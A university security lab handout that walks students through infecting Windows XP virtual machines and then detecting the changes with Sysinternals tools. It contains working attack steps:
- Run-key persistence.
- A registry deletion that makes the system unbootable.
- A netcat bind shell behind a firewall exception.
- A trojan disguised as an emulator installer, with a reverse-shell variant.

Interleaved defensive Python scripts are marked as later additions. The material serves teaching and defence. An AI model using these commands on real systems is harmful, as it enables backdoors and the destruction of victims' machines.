System Monitoring with Sys-Internals Lab
ECE 4112 Internetwork Security Lab: System Monitoring with Sys-Internals and C script infection

Created by Jason Orlosky, Phillip Michael, and Todd Lyon
Date Assigned:
Date Due:
Last Edited:

Please read the entire lab and any extra materials carefully before starting. Be sure to start early enough so that you will have time to complete the lab. Answer ALL questions in the provided Answer Sheet and be sure you turn in ALL materials listed in the Turn-in Checklist on or before the Date Due.

Goal: This lab will help you understand how to infect a Windows system and then monitor the system to detect any changes with Sysinternals tools. It will also review infecting a system with C scripts.

Summary: In this lab, you will be infecting machines in various ways. First you will infect the registry manually and then monitor to see what changes have been made. You will also learn how to disable a Windows operating system by modifying the registry. Then you will investigate how a C script works and infects a system by opening ports.

Background: References on the registry and how it works can be found here: http://support.microsoft.com/default.aspx?scid=kb;en-us;256986

Prelab Questions: None

Lab Scenario: None
Section 1: Registry Manipulation and Having Evil Fun

Intro / Background

In this part of the lab, you will be manipulating the Windows registry. The Windows registry is the part of Windows that contains information about all programs on the system as well as vital system information. The registry can be used to configure programs, drivers, and system settings by modifying its keys. The registry is also important for startup of the system, since it has replaced files such as .ini files, autoexec.bat, and Config.sys from previous operating systems.

You will be creating another copy of Windows XP in VMware to infect. You will see how to create registry keys to keep a virus alive on a system and how to disable the system's OS by deleting essential registry keys. We will also see how to detect registry modifications and prevent their improper use. The tools we will be using in this lab are Regedit, the Sysinternals tool RegMon, registry editing commands, batch files, and the Jetico Firewall.

Note that the methods of infection we will be reviewing are for after a virus has been put on a host system. Many of the new viruses and spyware today use the Windows registry as a starting point for re-infection.

Modifying Registry Keys

Here are several commands that can be used in a command prompt or via software to modify the registry:

1) Adding a key: REG ADD RegistryPath /V Name /d Data
2) Modifying an existing key: REG UPDATE RegistryPath /V Name /d Data
3) Deleting a key: REG DELETE RegistryPath [/FORCE]

Additional commands for modifying or searching the registry can be found in Appendix B. Type "reg" on the command line for a list of commands in the registry editor. Typing a specific command followed by "/?" will give you the parameters and examples of how to use that command.

Instead of having to type various commands on the command line, we can make use of Windows batch files. This will also enable us to modify keys without actually having to open a command window. A coder can create .exe files to have the same functionality, but for this part of the lab, batch files will serve our purpose. The syntax of a batch file will be explained in the sections describing methods of infection.

First we need to create a new virtual copy of Windows, since we will eventually make the OS unbootable through the registry. Refer to Appendix C on how to make a copy of your Windows XP virtual machine.
After you have made a copy, boot it and proceed.

Sample Registry Modification

The first section of the registry we will infect is the location of Windows startup items. To begin, we will take a look at what the registry looks like in a hierarchical file-folder format. Each of these folders that contains registry values is called a hive.

1) Click Start -> Run and in the text field, type regedit and then press Enter.
   - This program can be used on any Windows machine to modify registry keys in a GUI format. You should see the Registry Editor window on your screen after hitting Enter.
2) Navigate to the following location in the GUI by expanding the corresponding hives:
   - HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
   Here you should see several programs which will start up with the operating system after booting. Keys can be added to this location to start programs.
3) Add the following key to the registry via the command line (all on one line):
   REG ADD HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v CMDstarter /d "C:\WINDOWS\SYSTEM32\cmd.exe"
   /v specifies the value name of the key and /d specifies the data. After adding the key via the command line, refresh the contents of the Run hive by clicking on another folder in the registry and then back on the Run hive.

Q1.1 List the keys you see in the registry, including the key you just added. Be sure to show the names and data of each key.
Remove the new CMDstarter key from the registry using Regedit. Just right-click on the specified key and click Delete. Click OK when asked if you are sure you want to delete it.

Keeping a Virus Alive on a System

To show how adding registry keys in this location is useful, we have written a batch file that installs a virus. The batch file, once on the system, will install and run the virus from a separate file. Generally, a user can detect that a virus is running by opening the Task Manager and checking for malicious-looking programs. We can disguise the installation file as a different file which will only run for a few seconds to install and run the virus. This way, an untrained administrator will be unable to tell why the virus is re-infecting the system.

1) Download the following files and folders from the NAS server onto your Windows XP virtual machine:
   - HiddenFolder: contains Infect.bat and RenameMe.exe
   - Regmon.exe
2) Run the Infect.bat file by double-clicking it.
   - This is the file that will actually infect the system. It should only run for a fraction of a second before the viral code executes.
   - Start the Task Manager by right-clicking on the taskbar and clicking 'Task Manager.' This can also be done with Ctrl+Alt+Del.
   - Notice the MrMalicious.exe process that is running in the Task Manager. Ignore the inner workings of MrMalicious for now.
   - This is primarily to show that the Infect.bat file will add a registry key to install and run the MrMalicious program. A hacker could add code to MrMalicious to harm a system. The MrMalicious.exe we have written simply takes up CPU time.
3) Open Regedit again and navigate to the same Run folder we edited before. Notice how the Infect.bat file has been added as a registry key.
4) Click Start -> My Computer.
   - Navigate to C:\Windows.
   - Find the exe file called MrMalicious and delete it.
5) Restart the Windows XP virtual machine. The MrMalicious process should now be running just after startup. Notice that startup takes longer since the MrMalicious program is taking up CPU time.
6) Edit your Infect.bat file by right-clicking and selecting Edit from the menu. Review the code in the batch file to answer the following question.
Q1.2 Explain how the Infect.bat file infects the system so that the viral process "MrMalicious.exe" continues to be present even after it is deleted and the system is restarted. Use Appendix A and B as references if necessary.

Attachment #1

7) Create a batch file using the commands in Appendix A and B to remove the key in the following folder and add a new key with your name as the Name and no data:
   HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Audio
   Feel free to use existing batch files as a reference. Attach the code for this batch file to the end of your lab.

Disabling antivirus and firewall programs with the registry

1) The registry can easily be used to disable programs that start up with the computer.
   - Download the Jetico Firewall (Jpfwall.exe) from the NAS server and install it by double-clicking on the exe file.
   - Choose all the default options for installation, but do NOT restart when prompted after the installation process. This installation will demonstrate how standard programs assert themselves on a system and start up.
2) Navigate to the Run folder and notice that the firewall has inserted a key that will start it after the system boots. In order to remove it without manually using the registry editor, a very simple scheme can be used to prevent anything from starting up on the host system.
   - Windows will restore several of the basic keys in the Run folder by default to start certain services such as QuickTime. A hacker could remove all of the keys in the Run folder on his or her system and then export that key into a backup file. Registry backup files can be double-clicked and will re-insert themselves into the registry, replacing old keys of the same title. Running the backup of a blank Run folder would replace all the startup items with nothing.
3) Remove this registry key with Regedit and uninstall the firewall through Control Panel -> Add/Remove Programs.

Q1.3 How would someone remove solely the firewall key without knowing its title? Describe what a hacker's software would have to do in order to prevent a specific program from starting up, such as Norton Antivirus or ZoneAlarm Firewall. (Hint: The query command would be useful.)
Section 2: Detecting Registry Modification and Removing Malicious Keys

We will use the Sysinternals tool RegMon to monitor our system's registry accesses and modifications. RegMon is an excellent tool since it shows all registry accesses with time, process, path, and data. These attributes will be extremely valuable in determining which keys have been added by a viral program.

1) Download the RegMon tool from the NAS and run it.
   - The tool will immediately begin capturing registry entries. Most of these entries are valid accesses by Windows programs. In order to detect invalid or malicious registry keys, we need to begin filtering out the valid registry accesses, so that only malicious ones will be logged.
2) After about 20 seconds of capturing, click File and uncheck 'Capture Events.'
   - You should now have several hundred entries with which to start filtering.
   - The easiest way to begin filtering is with process names.
3) Click Options -> Filter/Highlight and the filter window will appear. Enter some of the names of processes, such as "Explorer; svchost; winlogon", to exclude from the display. Filter options are separated by commas. Begin capturing again by re-checking the 'Capture Events' option.
Keep adding to the filter string while registry reads and writes are occurring. You will see that fewer and fewer reads and writes show up on the list.

4) Once most of the very commonly occurring processes have been filtered out, run the Infect.bat file used in the beginning of the lab.

Screenshot #1 Search through the registry accesses and locate the malicious key. Highlight the key in RegMon and take a screenshot. Include this with your lab for turn-in.

The easiest way to delete this maliciously added key is to use Regedit and navigate to the key's hive. Do this now and delete the key using Delete from the right-click menu.

Disabling the Operating System by Deleting Essential Keys

Note: This part of the lab is EXTREMELY malicious, do not do this to your friends!!!!!

Unfortunately for Microsoft, the registry is an essential point of operation for Windows. It carries information about all Windows processes. Some of these processes require registry keys in order to run. We will disable the operating system by removing several essential folders in the registry.

1) Start Regedit.
2) Delete the following key, click OK if an error is generated, and reboot the VM:
   - HKEY_LOCAL_MACHINE\SOFTWARE
   This could also be accomplished by typing the following on the command line:
   REG DELETE HKEY_LOCAL_MACHINE\SOFTWARE

Restarting the system will not work. This is extremely effective because the system will not even start in safe mode!!! A user or admin must repair or re-install the operating system from external bootable media.

Screenshot #2 Take a screenshot of the failed system and attach it to your lab report. On the screenshot, describe what happened upon reboot.

In order to prevent this from happening, a user should back up the whole registry on a separate disk. Users can back up the registry by exporting major keys via Regedit. He or she could then boot from a Windows CD and re-insert the keys into the registry from the backup file, keeping information about current programs. If the user did not have these backups, he or she would be forced to repair or re-install the operating system. Neither repairing nor re-installing would recover data from programs that are not on the Windows CD, such as AOL Instant Messenger or Microsoft Office.
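The RegMon filtering procedure in Section 2 above is something a defender can script rather than click through. The following is an added example (not part of this lab and not a Sysinternals tool): it applies a RegMon-style process exclusion string to saved log lines, then keeps only successful write operations (SetValue, CreateKey, DeleteValue, DeleteKey) whose path lies under one of the Run, RunOnce or RunServices keys, which is where Infect.bat persists. The log lines, their tab-separated column layout, and the process and value names in them are constructed assumptions for the example, not a real RegMon capture.

```python
"""Filter RegMon-style registry activity and surface writes to autostart keys.

Added example; the log lines below are constructed to resemble RegMon's
columns (sequence, time, process:pid, request, path, result, other) and are
assumed to be tab-separated. They are not a real capture.
"""
import re

# Autostart locations discussed in the lab: HKLM/HKCU ...\CurrentVersion\Run*
AUTOSTART_RE = re.compile(
    r"^(?:HKLM|HKCU|HKEY_LOCAL_MACHINE|HKEY_CURRENT_USER)\\Software\\Microsoft\\Windows"
    r"\\CurrentVersion\\Run(?:Once|Services|ServicesOnce)?(?:\\|$)",
    re.IGNORECASE,
)

# Requests that change the registry, as opposed to reads.
WRITE_REQUESTS = {"SetValue", "CreateKey", "DeleteValue", "DeleteKey"}

# Constructed sample log (not a real RegMon capture); one event per line.
SAMPLE_LOG = (
    "1\t10:01:02\tExplorer.EXE:1204\tOpenKey\tHKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\tSUCCESS\tAccess: 0x20019\n"
    "2\t10:01:02\tExplorer.EXE:1204\tQueryValue\tHKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\VMwareTray\tSUCCESS\t\"C:\\Program Files\\VMware\\VMware Tools\\VMwareTray.exe\"\n"
    "3\t10:01:03\tsvchost.exe:896\tQueryValue\tHKLM\\System\\CurrentControlSet\\Services\\Dhcp\\Parameters\\Options\tNOTFOUND\t\n"
    "4\t10:01:05\tcmd.exe:1788\tOpenKey\tHKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\tSUCCESS\tAccess: 0x2001F\n"
    "5\t10:01:05\treg.exe:1792\tSetValue\tHKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\Infect\tSUCCESS\t\"C:\\HiddenFolder\\Infect.bat\"\n"
    "6\t10:01:06\twinlogon.exe:612\tQueryValue\tHKLM\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\Shell\tSUCCESS\t\"Explorer.exe\"\n"
    "7\t10:01:07\tnotepad.exe:1900\tSetValue\tHKCU\\Software\\Microsoft\\Notepad\\lfFaceName\tSUCCESS\t\"Lucida Console\"\n"
)


def parse_regmon(text):
    """Turn tab-separated RegMon-style lines into a list of event dicts."""
    events = []
    for line in text.splitlines():
        parts = line.split("\t")
        if len(parts) < 6:          # blank or truncated line
            continue
        seq, time, proc, request, path, result = parts[:6]
        other = parts[6] if len(parts) > 6 else ""
        name, _, pid = proc.rpartition(":")
        events.append({
            "seq": int(seq), "time": time, "process": name, "pid": pid,
            "request": request, "path": path, "result": result, "other": other,
        })
    return events


def exclude_processes(events, filter_string):
    """Mimic RegMon's exclude filter: names separated by ';' or ',' are matched
    case-insensitively as substrings of the process name."""
    names = [n.strip().lower() for n in re.split(r"[;,]", filter_string) if n.strip()]
    return [e for e in events if not any(n in e["process"].lower() for n in names)]


def autostart_writes(events):
    """Successful writes whose path is under one of the Run* autostart keys."""
    return [
        e for e in events
        if e["request"] in WRITE_REQUESTS
        and e["result"] == "SUCCESS"
        and AUTOSTART_RE.match(e["path"])
    ]


if __name__ == "__main__":
    kept = exclude_processes(parse_regmon(SAMPLE_LOG), "Explorer; svchost; winlogon")
    for e in autostart_writes(kept):
        print(f"[{e['time']}] {e['process']} (pid {e['pid']}) {e['request']} {e['path']} -> {e['other']}")
```

The process exclusion only shrinks the noise; the autostart-path check is what actually finds the key, so it is also run over the unfiltered log in the test to show the two steps are independent.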
Q2.4 Why is it that not many hackers have used the registry to disable operating systems?

Section 3: Making Use of the Windows Registry and Other Command Line Options to Exploit Windows

In this section of the lab, we will be implementing basic C programming along with the Netcat tool to exploit the Windows XP registry and the Windows XP firewall, so that root access to a Windows XP machine with SP2 installed can be gained.

For this section of the lab, a new Windows XP virtual machine with SP2 installed will need to be created. In order to do this, please follow the instructions from "LAB 1: OS Installation and Introduction to Security Tools" on creating a virtual machine; you will need to make sure an image of Windows XP with SP2 is available on the NAS or from the TA. We will also be using our RedHat 7.2 virtual machine as the attacker; please make sure Netcat is installed on this virtual machine as well. Information on installing Netcat for both the Windows XP and RedHat 7.2 virtual machines can be found in "LAB 6: Backdoors and Trojans"; a copy of this information is also provided in Appendix D, along with descriptions of the basic functions of Netcat.

To begin with, please make sure to install Netcat in a new directory called C:\nc11nt on the Windows XP machine (Netcat should already be installed on the RedHat 7.2 machine; if not, follow the instructions in Appendix D), and turn on both the RedHat 7.2 (IP 57.35.6.x+1) and Windows XP (IP 57.35.6.x+3) virtual machines.

Refamiliarizing Ourselves with Netcat and the Windows XP Firewall

Before we review some basic Netcat commands, make sure the Windows XP firewall is enabled in your Windows XP virtual machine. To do this, go to the Control Panel and then open "Windows Firewall". Make sure that under the General tab the firewall is set to "On", but that the "Don't allow exceptions" box is not checked. Next, take a few moments to review the Netcat parameters in Appendix D.

At this point, before continuing with the lab, take a snapshot of the Windows XP SP2 virtual machine. We will be reverting to this snapshot later in this section of the lab. The options to do this should be at the top of the virtual machine window. If for some reason you are in a view in which you are unable to access this option, ask a TA for assistance.

Now on the Windows XP machine go to Start -> Run and type "cmd". Next go to the C:\nc11nt directory by typing cd \nc11nt. While in the Netcat directory, type "nc -L -p 8633 -e cmd.exe". After running this command, you should see a Windows Security Alert. This is because the firewall by default is set to not allow incoming traffic on port 8633, and Netcat is in listen mode expecting a connection on this port.
Screenshot #3 Take a screenshot of the Windows Security Alert asking if you want to keep blocking the nc program.

Now choose "Keep Blocking". The Netcat program is still trying to listen on the port. On your 8.0 machine open up Ethereal and start packet capture in promiscuous mode. Switch to your RedHat 7.2 machine, and from the terminal try the command "nc 57.35.6.x+3 59". Now stop the capture in Ethereal and view the packets.

Q3.1 What does Ethereal show transpired between the 7.2 and Windows XP machines? Why did this occur?

Hit Ctrl-C on both the Windows XP and RedHat 7.2 command lines. Now from the 7.2 command line run nmap against the Windows machine ("nmap 57.35.6.x+3"). Pick a port listed as open and now run the command "nc -L -p open_port -e cmd.exe" from the Windows command line. Notice that no Windows Security Alert pops up. Now from the 7.2 machine run nc 57.35.6.x+3 open_port. Notice this still doesn't work. Even using Netcat's -s option (see man nc on 7.2 for more information on the -s option) and binding a port picked up by nmap does not allow the 7.2 machine to connect.

So now what? From the Windows command line, type the command "netsh firewall show portopening".

Q3.2 What does this command show?

If there are any additional ports (ones not found by the port scan), they may be able to be used to gain access with Netcat. To do this you can try to run "nc -L -p additional_port -e cmd.exe" from the Windows machine, and then nc 57.35.6.x+3 additional_port from the 7.2 machine. However, to be safe, or rather to avoid any further Windows Security Alerts, it is better to just go ahead and set up the firewall to accept traffic to Netcat on a certain port.

To start with, from the Windows command line, type "netsh firewall" to view a list of commands available when editing or viewing the firewall. Now type "netsh firewall add"; doing this gives you the possible parameters for the add command. As you can see by playing around with the various commands, many options are available to you, and the Windows XP SP2 firewall can be manipulated however you choose. When looking at the firewall options from the Control Panel earlier, you may remember the box that could be checked to not allow exceptions. In order to turn this off, all you have to do is type "netsh firewall reset" and the Windows XP firewall is reset to its default state, which allows exceptions. This is a huge insecurity in the firewall.
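As a defensive counterpart to the netsh firewall exploration above, here is an added example (not from the lab and not a Microsoft tool) that audits saved output of netsh firewall show portopening against the port openings Windows XP SP2 enables by default for file and printer sharing, and reports every enabled opening that is not on that list. The sample text, its column layout, the default-opening baseline and the flagged entry are all assumptions constructed for the example; on a real machine the text would be captured with netsh firewall show portopening > openings.txt.

```python
"""Audit Windows XP SP2 firewall port openings from saved netsh output.

Added example. SAMPLE_OUTPUT is constructed in the layout the command is
assumed to print (a profile header, a column header, a dashed rule, then one
row per opening); it is not real output. EXPECTED is an assumed baseline.
"""
import re

SAMPLE_OUTPUT = """\
Port configuration for Domain profile:
Port   Protocol  Mode     Name
-------------------------------------------------------------------
139    TCP       Enable   NetBIOS Session Service
445    TCP       Enable   SMB over TCP
137    UDP       Enable   NetBIOS Name Service
138    UDP       Enable   NetBIOS Datagram Service

Port configuration for Standard profile:
Port   Protocol  Mode     Name
-------------------------------------------------------------------
139    TCP       Enable   NetBIOS Session Service
445    TCP       Enable   SMB over TCP
137    UDP       Enable   NetBIOS Name Service
138    UDP       Enable   NetBIOS Datagram Service
8633   TCP       Enable   nc
8633   UDP       Enable   nc
3389   TCP       Disable  Remote Desktop
"""

# Openings assumed to be present on a stock XP SP2 install for file and
# printer sharing; anything else that is enabled deserves a second look.
EXPECTED = {(139, "TCP"), (445, "TCP"), (137, "UDP"), (138, "UDP")}

PROFILE_RE = re.compile(r"^Port configuration for (\w+) profile:")
ROW_RE = re.compile(r"^(\d+)\s+(TCP|UDP)\s+(Enable|Disable)\s+(.*\S)\s*$")


def parse_portopenings(text):
    """Return one dict per opening row, tagged with the profile it belongs to."""
    entries, profile = [], None
    for line in text.splitlines():
        m = PROFILE_RE.match(line)
        if m:
            profile = m.group(1)
            continue
        m = ROW_RE.match(line)
        if m and profile:           # header and dashed lines do not match ROW_RE
            entries.append({
                "profile": profile,
                "port": int(m.group(1)),
                "protocol": m.group(2),
                "enabled": m.group(3) == "Enable",
                "name": m.group(4),
            })
    return entries


def unexpected_openings(entries, expected=EXPECTED):
    """Enabled openings whose (port, protocol) is not in the expected baseline."""
    return [e for e in entries
            if e["enabled"] and (e["port"], e["protocol"]) not in expected]


if __name__ == "__main__":
    for e in unexpected_openings(parse_portopenings(SAMPLE_OUTPUT)):
        print(f"{e['profile']:8} {e['protocol']}/{e['port']:<5} {e['name']}")
```

Disabled rows are parsed but not reported, so a rule that was added and later switched off still shows up in the parsed entries for anyone who wants to review it.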
In our case we want to poke a hole through this firewall to allow access to the Windows XP machine via Netcat. To do this we will use the command:

netsh firewall add portopening protocol = ALL port = 8633 name = nc mode = ENABLE scope = ALL profile = ALL

Entering this one command from the Windows XP command line allows an opening in the firewall specifically for Netcat (nc.exe) on port 8633 for both TCP and UDP, and for all users, if executed with administrator access. After entering this command, let's retry our original attempt to gain access to the Windows machine. From the Windows XP command prompt, type "nc -L -p 8633 -e cmd.exe". Now from the 7.2 machine, type "nc 57.35.6.x+3 8633". SUCCESS!!!

Notice that as soon as you close the command window in Windows, you lose the connection on the 7.2 machine. In order to avoid this, from the Windows XP command prompt type "nc -L -p 8633 -e cmd.exe -d". Now close the command window and attempt to connect again. The -d option allows Netcat to run silently. If you hit Ctrl-Alt-Del in Windows you can find nc.exe in the process list.

Using Knowledge of Netcat, the Windows Registry, the Windows Firewall, and Basic C Programming to Write an Exploit

At this point use the Revert option at the top of the Windows XP SP2 virtual machine to revert Windows back to the state found towards the beginning of this section. This is done in order to restore the Windows XP firewall.

At this point in the lab, let us pretend we are a hacker with not so pleasant intentions operating from the RedHat 7.2 machine. The Windows XP machine is being operated by a co-worker, schoolmate, roommate, or anyone you can think of that would be found on the same network as you (i.e. no router is separating you). On the Windows XP machine, download the ZSNES.zip file from the NAS and put it in a new folder. This file is a self-extracting zip that installs the ZSNES Super Nintendo emulator (a freeware SNES emulator for the PC). In addition to installing the emulator, this self-extracting zip also installs Netcat and executes another program called installer.exe (also known as Trojan 8633, 8633 being the numeric representation of TODD, for Todd Lyon, the author of this exploit and of this section of the lab). Thinking he is in for an exciting afternoon of playing Super Mario World, and possibly even a little Ogre Battle, our unsuspecting Windows XP user is more than happy to take and install the emulator you give him. After he installs it, you have administrative access to his machine for as long as you are on the same network with him (assuming he is not extremely knowledgeable about his registry or firewall, and doesn't decide to format his hard drive).
At this point, run the self-extracting ZSNES.zip file. You will notice a couple of OKs popping up in a command prompt, and then you will be in a folder with the newly installed ZSNES emulator. From the RedHat 7.2 machine, type "nc 57.35.6.x+3 8633". After this you will be at the Windows XP machine's command prompt. Now power off the Windows machine and restart it.

Q3.3 What happens when you restart the Windows XP machine and try to connect from the RedHat 7.2 machine with Netcat?

For Netcat to still be running in listen mode after rebooting the computer, the registry had to have been altered by the installer.exe file. But how? The Windows XP registry has six registry keys designated for launching programs when starting up the computer. They are:

HKCU\Software\Microsoft\Windows\CurrentVersion\Run
  - Launches the program when a specific user logs in
HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce
  - Launches the program the next time a specific user logs in, then is removed from the registry
HKLM\Software\Microsoft\Windows\CurrentVersion\Run
  - Launches the program automatically at system startup
HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnce
  - Launches the program automatically on the next system startup, then is removed from the registry
HKLM\Software\Microsoft\Windows\CurrentVersion\RunServices
  - Launches the service automatically at system startup (e.g. AIM)
HKLM\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce
  - Launches the service automatically on the next system startup, then is removed from the registry

At this time, download the files installer.c and server.c and view the code used for this attack. Looking in the installer.c file, we can see that the entire program is made up of system calls.
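An added example (not part of the lab) showing how the six autostart keys listed above can be checked by snapshot-and-diff rather than by eye: dump each key with reg query before the machine is exposed and again after a suspect program has run, then compare the two dumps. The snapshot texts below are constructed to resemble REG QUERY output on Windows XP (a key path line followed by indented name, type and data columns separated by runs of spaces or tabs); the listed values, and the appearance of the lab's update value in the second snapshot, are assumptions for the sample, not a real dump.

```python
"""Snapshot-and-diff of the six Windows autostart (Run*) registry keys.

Added example. BASELINE and AFTER_INSTALL are constructed to resemble
`REG QUERY <key>` output on Windows XP; they are not real dumps. On a real
machine each snapshot would be produced by running `reg query <key>` for
every key in AUTOSTART_KEYS and saving the text.
"""
import re

# The six autostart locations listed in the lab.
AUTOSTART_KEYS = [
    r"HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run",
    r"HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce",
    r"HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run",
    r"HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnce",
    r"HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServices",
    r"HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce",
]

# Constructed baseline snapshot (assumed clean machine).
BASELINE = r"""
! REG.EXE VERSION 3.0

HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run
    VMware Tools    REG_SZ    C:\Program Files\VMware\VMware Tools\VMwareTray.exe
    SoundMAX    REG_SZ    C:\Program Files\Analog Devices\SoundMAX\SMTray.exe

HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
    ctfmon.exe    REG_SZ    C:\WINDOWS\system32\ctfmon.exe
"""

# Constructed snapshot taken after the suspect installer ran.
AFTER_INSTALL = r"""
! REG.EXE VERSION 3.0

HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run
    VMware Tools    REG_SZ    C:\Program Files\VMware\VMware Tools\VMwareTray.exe
    update    REG_SZ    c:\windows\system32\server.exe

HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
    ctfmon.exe    REG_SZ    C:\WINDOWS\system32\ctfmon.exe
"""

_SEP = re.compile(r"\t+| {2,}")   # columns: tabs (XP) or runs of spaces (later)


def parse_reg_query(text):
    """Return {key_path: {value_name: (type, data)}} from REG QUERY text."""
    snapshot, current = {}, None
    for raw in text.splitlines():
        if not raw.strip() or raw.startswith("!"):
            continue
        if not raw[0].isspace():               # unindented line = key path
            current = raw.strip()
            snapshot.setdefault(current, {})
            continue
        if current is None:
            continue
        fields = _SEP.split(raw.strip(), maxsplit=2)
        if len(fields) == 2:                   # value with empty data
            fields.append("")
        if len(fields) == 3:
            name, vtype, data = fields
            snapshot[current][name] = (vtype, data)
    return snapshot


def diff_autostart(baseline, current, keys=AUTOSTART_KEYS):
    """Compare two snapshots over the autostart keys. Key and value names are
    case-insensitive in the registry, so they are folded before comparison.
    Returns (added, removed, changed)."""
    def fold(snap):
        return {k.lower(): {n.lower(): (n, t, d) for n, (t, d) in v.items()}
                for k, v in snap.items()}
    base, cur = fold(baseline), fold(current)
    added, removed, changed = [], [], []
    for key in keys:
        b, c = base.get(key.lower(), {}), cur.get(key.lower(), {})
        for n, (name, vtype, data) in c.items():
            if n not in b:
                added.append((key, name, data))
            elif b[n][1:] != (vtype, data):
                changed.append((key, name, b[n][2], data))
        for n, (name, vtype, data) in b.items():
            if n not in c:
                removed.append((key, name, data))
    return added, removed, changed


if __name__ == "__main__":
    added, removed, changed = diff_autostart(parse_reg_query(BASELINE),
                                            parse_reg_query(AFTER_INSTALL))
    for key, name, data in added:
        print(f"NEW      {key}\\{name} = {data}")
    for key, name, data in removed:
        print(f"REMOVED  {key}\\{name} (was {data})")
    for key, name, old, new in changed:
        print(f"CHANGED  {key}\\{name}: {old} -> {new}")
```

Only the six keys are compared, so unrelated values that happen to be in the dumps are ignored; the baseline has to be taken before the machine is exposed, since a snapshot taken afterwards would simply include the malicious entry.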
Looking at the seventh system call, the command

reg add hklm\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v update /t REG_SZ /d c:\windows\system32\server.exe /f

is run. This command adds a value to the HKLM\Software\Microsoft\Windows\CurrentVersion\Run key, which launches programs automatically at system startup. The server.exe file is the file run when the machine is started. Looking at the server.c file, you can see that all it does is run the "nc -L -p 8633 -e cmd.exe -d" command. From the exploited Windows machine, bring up a command prompt and run the command regedit.

Screenshot #4 Take a screenshot of the entry running server.exe highlighted in the registry editor.

Modifying the 8633 Exploit to Access a Machine Outside of Our Network

Using the same concept of giving the self-extracting zip to some unsuspecting Windows XP user, we want to find a way to access their machine if we are on a separate network from them. In order to do this, we have to find a way to talk to their machine without the router dropping all the packets we are trying to send them. The easiest way to do this is to have their machine SYN our machine; this way they initiate the connection. If we simply change the eighth system call of installer.c from "nc -L -p 8633 -e cmd.exe -d" to "nc your_ip 8633 -e cmd.exe -d" and have our machine waiting in listen mode on port 8633, then as long as no firewall is blocking our port 8633, we will have a shell to their command prompt.

Because we are using exe files when attacking a Windows system, the installer.c file needs to be compiled in Windows. Fortunately the Microsoft C/C++ Optimizing Compiler and Linker are freely available. The compiler can be found at http://msdn.microsoft.com/visualc/vctoolkit2003/. Microsoft's linker is available at http://www.microsoft.com/whdc/devtools/debugging/installx86.mspx.
However, for the purpose of this lab, the compiler and debugger can both be found on the NAS. After installing these tools, to compile the new code we use the command "cl /Zi /MLd /Fe installer2.c". In order to create a self-extracting zip, Zip 2 Secure was used (obtained from www.download.com).

Q3.4 How can you detect malicious code such as the 8633 program running on your computer?

Q3.5 What should you do to avoid having malicious code such as this installed on your machine in the first place?

Section 4: More Monitoring with Sysinternals

In this part of the lab you will monitor your system as a virus is unleashed. To monitor the virus we will be using four utilities from http://sysinternals.com and Ethereal. These utilities will log registry accesses (Regmon), file accesses (Filemon), network accesses (TDIMon), and network traffic (Ethereal), and view live process information (Process Explorer).

Task Guide

1. Install WinPcap from the network share.
2. Copy the sysinternals folder to your desktop.
3. Start Ethereal capturing packets.
4. Open the sysinternals folder.
   a. Start Regmon, located in the ntregmon folder.
   b. Start Filemon, located in the ntfilemon folder.
   c. Start TDIMon, located in the tdimonnt folder.
   d. Start Process Explorer, located in the procexnt folder.
5. Execute the virus (document.pif).
6. Switch to Process Explorer.
   a. In Process Explorer find the virus.
      Q 4.1 - What is the name of the virus process loaded in memory?
   b. Right-click on the virus process and select Properties.
      i. Then select the TCP/IP tab.
         Q 4.2 - Is this process running a server?
         Q 4.3 - If yes, what port is it listening on?
      ii. Close the Properties window.
7. Let's find out what service is running on the port you just discovered.
   a. Open a command prompt (Start -> Run "cmd").
      i. Telnet to the port, e.g. "telnet 127.0.0.1 21" if the port is 21.
         Q 4.4 - What type of server does this appear to be?
      ii. Next try ftping to the port, e.g. "ftp" (Enter), then "o 127.0.0.1 21".
         Q 4.5 - Do you receive a login prompt?
      iii. If so, try logging in.
         1. Log out by typing "bye".
         S 4.1 - Take a screen capture of your ftp session.
   b. Right-click on the virus process, select Kill Process, and close Process Explorer.
8. Switch to Ethereal.
   a. Stop the capture.
   b. Q 4.6 - What port number do you see a large number of connections to? Help: try using the filter "tcp.flags == 2".
   c. Q 4.7 - Why do you think this is?
   d. Since you're not on a live internet connection, open the virus3.pcap file. This file is a capture of the same virus on a live internet connection.
      i. Q 4.8 - What port are connections established to? Help: try using the filter "tcp.flags == 0x12", then right-click and follow some of the TCP streams.
      ii. Q 4.9 - What is it connecting to these 2 different ports for?
9. Switch to the Registry Monitor.
   a. Q 4.10 - What is the virus repeatedly doing to the registry, and why do you think this is?
   b. S 4.2 - Take a screen capture of this.
10. Switch to Filemon.
   a. Use Filemon to find the answers to the following questions.
      i. Q 4.11 - What is the name and path of the executable created once document.pif is executed?
      ii. Q 4.12 - There are 3 files created to replicate the virus on the hard drive. Where are they and what are their names?
      iii. Q 4.13 - Why do you think the virus searches for files on the hard drive? Hint: It has to do with the traffic going to port 25.
11. Switch to TDIMon.
   a. The virus is trying to open a lot of connections to hosts.
      i. Q 4.14 - What port is it trying to connect to and why?
      ii. S 4.3 - Take a screen capture of this.
12. Remove the virus (or remove the VMware image).
   a. Execute FixMytob.exe.

Q 4.15 - What is an advantage of active logging over active monitoring?
